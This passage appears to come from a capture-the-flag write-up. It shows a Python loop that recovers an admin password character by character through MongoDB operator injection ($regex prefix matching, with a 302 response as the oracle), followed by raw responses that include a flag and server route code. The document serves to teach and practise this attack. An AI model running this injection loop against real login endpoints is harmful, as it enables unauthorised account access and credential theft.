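# Character-by-character password recovery loop from the writeup (restored from a
# collapsed, whitespace-stripped paste: `whileTrue:` -> `while True:`, `notin` -> `not in`).
# The login endpoint appears to pass the JSON body straight through as a MongoDB
# query document, so the `$eq` / `$regex` operator objects are honoured and the
# 302-vs-200 response acts as a one-bit oracle per request. The server-side code for
# that endpoint is not shown on this page; only the `/site` route is.
# Relies on `u`, `username`, `password`, `headers` and `requests` being set up earlier.
while True:
    for c in string.printable:
        # Regex metacharacters are skipped so the `^prefix` pattern stays a literal match.
        if c not in ['*', '+', '.', '?', '|']:
            payload = '{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            # verify=False disables TLS certificate validation for this request.
            r = requests.post(u, data = payload, headers = headers, verify = False)
            print(r.text + ' ' + str(r.status_code))
            #if 'Found' in r.text:
            # A redirect (302) means the regex matched; the 200 body is "Wrong username or password".
            if r.status_code == 302:
                print("Found one more char : %s" % (password + c))
                password += c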
... Wrong username or password 200 Wrong username or password 200 <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Application Access Page</title></head><body><h2>Here's your first flag: actf{no_sql_doesn't_mean_no_vuln}<br>Access granted, however suspicious activity detected. Please enter password for user<b> 'admin' </b>again, but there will be no database query.</h2><form method="post"><label>Enter Password:</label><input type="text" name="pass2"><br><input type="submit"></form><h4 style="color:red;"></h4><pre>router.post('/site', verifyJwt, function (req, res) { // req.user is assigned from verifyJwt if (!req.user.authenticated || !req.body.pass2) { res.send("bad"); } var query = { username: req.user.name, } var db = req.db; db.collection('users').findOne(query, function (err, user) { console.log(user); if (!user){ res.render('access', {username:' \''+req.user.name+'\' ', message:"Only user 'admin' can log in with this form!"}); } var pass = user.password; var message = ""; if (pass === req.body.pass2){ res.render('final'); } else { res.render('access', {username:' \''+req.user.name+'\' ', message:"Wrong LOL!"}); } }); });</pre></body></html> 200 Wrong username or password 200 Wrong username or password 200 Wrong username or password 200 ...